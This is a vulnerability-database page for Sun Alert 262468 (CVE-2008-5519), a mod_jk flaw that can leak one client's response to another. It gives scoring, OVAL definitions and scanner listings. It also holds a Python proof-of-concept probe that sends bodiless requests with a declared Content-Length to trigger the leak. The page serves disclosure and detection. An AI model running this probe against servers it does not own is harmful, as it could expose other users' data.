Executive Summary

Summary
Title Sun Alert 262468 Security Vulnerability in the Apache 1.3 "mod_jk" Module may Lead to Unauthorized Access to Data
Information
Name SUN-262468 First vendor Publication 2009-06-25
Vendor Sun Last vendor Modification 2009-06-25
Severity (Vendor) N/A Revision N/A

Security-Database Scoring CVSS v3

Cvss vector : N/A
Overall CVSS Score NA
Base Score NA Environmental Score NA
impact SubScore NA Temporal Score NA
Exploitability Sub Score NA
 

Security-Database Scoring CVSS v2

Cvss vector : (AV:N/AC:H/Au:N/C:P/I:N/A:N)
Cvss Base Score 2.6 Attack Range Network
Cvss Impact Score 2.9 Attack Complexity High
Cvss Exploit Score 4.9 Authentication None Required

Detail

Product: Solaris 9 Operating System Solaris 10 Operating System

A security vulnerability has been found in the Tomcat Connector (mod_jk)
module for the Apache HTTP server which affects the Apache 1.3 web server
bundled with Solaris 10 and Solaris 9.

This issue may allow a remote unprivileged user who sends specially crafted
HTTP requests to bypass access control and obtain data intended for another
client, i.e. data they are not authorized to see.

Additional information regarding this issue is available at:

CVE-2008-5519 at: http://www.security-database.com/detail.php?cve=CVE-2008-5519


State: Resolved
First released: 25-Jun-2009

Original Source

Url : http://blogs.sun.com/security/entry/sun_alert_262468_security_vulnerability

CWE : Common Weakness Enumeration

% Id Name
100 % CWE-200 Information Exposure

OVAL Definitions

Definition Id: oval:org.mitre.oval:def:13218
 
Oval ID: oval:org.mitre.oval:def:13218
Title: DSA-1810-1 libapache-mod-jk -- information disclosure
Description: An information disclosure flaw was found in mod_jk, the Tomcat Connector module for Apache. If a buggy client included the "Content-Length" header without providing request body data, or if a client sent repeated requests very quickly, one client could obtain a response intended for another client. For the stable distribution, this problem has been fixed in version 1:1.2.26-2+lenny1. For the oldstable distribution, this problem has been fixed in version 1:1.2.18-3etch2. For the testing distribution and the unstable distribution, this problem has been fixed in version 1:1.2.26-2.1. We recommend that you upgrade your libapache-mod-jk packages.
Family: unix Class: patch
Reference(s): DSA-1810-1
CVE-2008-5519
Version: 5
Platform(s): Debian GNU/Linux 5.0
Debian GNU/Linux 4.0
Product(s): libapache-mod-jk
Definition Synopsis:
Definition Id: oval:org.mitre.oval:def:7824
 
Oval ID: oval:org.mitre.oval:def:7824
Title: DSA-1810 libapache-mod-jk -- information disclosure
Description: An information disclosure flaw was found in mod_jk, the Tomcat Connector module for Apache. If a buggy client included the "Content-Length" header without providing request body data, or if a client sent repeated requests very quickly, one client could obtain a response intended for another client. For the oldstable distribution (etch), this problem has been fixed in version 1:1.2.18-3etch2.
Family: unix Class: patch
Reference(s): DSA-1810
CVE-2008-5519
Version: 5
Platform(s): Debian GNU/Linux 5.0
Debian GNU/Linux 4.0
Product(s): libapache-mod-jk
Definition Synopsis:
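The condition DSA-1810 describes above (a request that declares a Content-Length but never sends the body, after which another client on the same backend connection receives the wrong response) is easiest to understand as the raw bytes on the wire. The following is an added lab-probe example, not code from Sun, Debian or the mod_jk project. It assumes a test target whose Tomcat-backed URL echoes the request's query string in the response body (the /echo path and the probe= parameter are hypothetical); the marker comparison is what turns "one client got another client's response" into something a scanner can assert on.

```python
"""Probe for the mod_jk cross-client response mix-up (CVE-2008-5519).

Added example, not code from Sun, Debian or the mod_jk project. Assumes a
lab target whose Tomcat-backed URL echoes the query string in its response
body (hypothetical /echo path); adjust PATH before using it elsewhere.
"""
import re
import socket
import uuid

PATH = "/echo"  # assumption: backend endpoint that echoes ?probe=<marker>


def build_probe_request(host, path=PATH, declared_length=16):
    """Return (marker, request) for the malformed client described in
    DSA-1810: Content-Length is declared, but no body follows the headers.
    An unpatched mod_jk can then deliver this request's response to the
    next client that reuses the same AJP connection."""
    marker = uuid.uuid4().hex
    request = (
        f"GET {path}?probe={marker} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"Content-Length: {declared_length}\r\n"
        "Connection: close\r\n"
        "\r\n"  # end of headers, and then nothing: the body is never sent
    )
    return marker, request


def build_follow_up_request(host, path=PATH):
    """Well-formed request sent right after the probe, as a second client."""
    marker = uuid.uuid4().hex
    request = (
        f"GET {path}?probe={marker} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return marker, request


def send_raw(host, port, request, timeout=5.0):
    """Send the bytes exactly as built (no HTTP client library, so nothing
    'helpfully' adds a body) and return whatever the server sends back.
    The probe connection is expected to time out: the server is waiting
    for a body that never comes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(request.encode("ascii"))
        chunks = []
        while True:
            try:
                data = s.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("latin-1", errors="replace")


def find_markers(response):
    """All 32-hex-digit probe markers echoed in a response body."""
    return set(re.findall(r"probe=([0-9a-f]{32})", response))


def detect_crosstalk(exchanges):
    """exchanges: list of (sent_marker, response_text).
    Returns (sent_marker, foreign_marker) pairs where a response carries a
    marker that belongs to a different request, which is the cross-client
    disclosure the advisory describes."""
    sent = {m for m, _ in exchanges}
    leaks = []
    for marker, response in exchanges:
        for found in find_markers(response):
            if found != marker and found in sent:
                leaks.append((marker, found))
    return leaks


def run_probe(host, port=80):
    """Send the malformed probe, then an ordinary request, and report leaks."""
    probe_marker, probe_req = build_probe_request(host)
    follow_marker, follow_req = build_follow_up_request(host)
    probe_resp = send_raw(host, port, probe_req)
    follow_resp = send_raw(host, port, follow_req)
    return detect_crosstalk([(probe_marker, probe_resp),
                             (follow_marker, follow_resp)])


# Constructed sample of a vulnerable exchange: the second client's response
# carries the first client's marker.
SAMPLE_EXCHANGES = [
    ("a" * 32, "HTTP/1.1 200 OK\r\n\r\nyou sent probe=" + "a" * 32),
    ("b" * 32, "HTTP/1.1 200 OK\r\n\r\nyou sent probe=" + "a" * 32),
    ("c" * 32, "HTTP/1.1 200 OK\r\n\r\nyou sent probe=" + "c" * 32),
]

if __name__ == "__main__":
    print(detect_crosstalk(SAMPLE_EXCHANGES))  # [('bbb…', 'aaa…')]
```

A version check (which is what the scanner plugins listed below do) is the reliable way to find unpatched hosts; this probe is for confirming the behaviour on a lab instance you own, because a single pair of requests on a busy server may or may not land on the same AJP connection.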

CPE : Common Platform Enumeration

Type Description Count
Application 24
Application 104

OpenVAS Exploits

Date Description
2010-02-03 Name : Solaris Update for Apache 1.3 122911-19
File : nvt/gb_solaris_122911_19.nasl
2010-02-03 Name : Solaris Update for Apache 1.3 122912-19
File : nvt/gb_solaris_122912_19.nasl
2009-11-11 Name : SuSE Security Summary SUSE-SR:2009:018
File : nvt/suse_sr_2009_018.nasl
2009-10-13 Name : Solaris Update for tomcat security 114016-04
File : nvt/gb_solaris_114016_04.nasl
2009-10-13 Name : Solaris Update for tomcat security 114017-05
File : nvt/gb_solaris_114017_05.nasl
2009-10-13 Name : Solaris Update for Apache 1.3 122911-17
File : nvt/gb_solaris_122911_17.nasl
2009-10-13 Name : Solaris Update for Apache 1.3 122912-17
File : nvt/gb_solaris_122912_17.nasl
2009-09-23 Name : Solaris Update for tomcat security 114017-04
File : nvt/gb_solaris_114017_04.nasl
2009-09-23 Name : Solaris Update for Apache 1.3 122911-16
File : nvt/gb_solaris_122911_16.nasl
2009-09-23 Name : Solaris Update for Apache 1.3 122912-16
File : nvt/gb_solaris_122912_16.nasl
2009-07-06 Name : Gentoo Security Advisory GLSA 200906-04 (mod_jk)
File : nvt/glsa_200906_04.nasl
2009-06-15 Name : RedHat Security Advisory RHSA-2009:1087
File : nvt/RHSA_2009_1087.nasl
2009-04-28 Name : RedHat Security Advisory RHSA-2009:0446
File : nvt/RHSA_2009_0446.nasl
2009-04-17 Name : Apache Tomcat mod_jk Information Disclosure Vulnerability
File : nvt/gb_apache_tomcat_mod_jk_info_disc_vuln.nasl

Open Source Vulnerability Database (OSVDB)

Id Description
53381 Apache Tomcat JK Connector Content-Length Header Cross-user Information Discl...

Nessus® Vulnerability Scanner

Date Description
2010-06-14 Name : The remote web server is prone to an information disclosure attack.
File : mod_jk_1_2_27.nasl - Type : ACT_GATHER_INFO
2010-01-10 Name : The remote Red Hat host is missing a security update.
File : redhat-RHSA-2009-1618.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_11_0_apache2-mod_jk-091028.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_11_1_apache2-mod_jk-091028.nasl - Type : ACT_GATHER_INFO
2009-11-05 Name : The remote openSUSE host is missing a security update.
File : suse_apache2-mod_jk-6599.nasl - Type : ACT_GATHER_INFO
2009-06-30 Name : The remote Gentoo host is missing one or more security-related patches.
File : gentoo_GLSA-200906-04.nasl - Type : ACT_GATHER_INFO
2009-06-03 Name : The remote Debian host is missing a security-related update.
File : debian_DSA-1810.nasl - Type : ACT_GATHER_INFO
2006-07-18 Name : The remote host is missing Sun Security Patch number 122911-37
File : solaris10_122911.nasl - Type : ACT_GATHER_INFO
2006-07-18 Name : The remote host is missing Sun Security Patch number 122912-37
File : solaris10_x86_122912.nasl - Type : ACT_GATHER_INFO
2004-07-12 Name : The remote host is missing Sun Security Patch number 114016-08
File : solaris9_114016.nasl - Type : ACT_GATHER_INFO
2004-07-12 Name : The remote host is missing Sun Security Patch number 114017-07
File : solaris9_x86_114017.nasl - Type : ACT_GATHER_INFO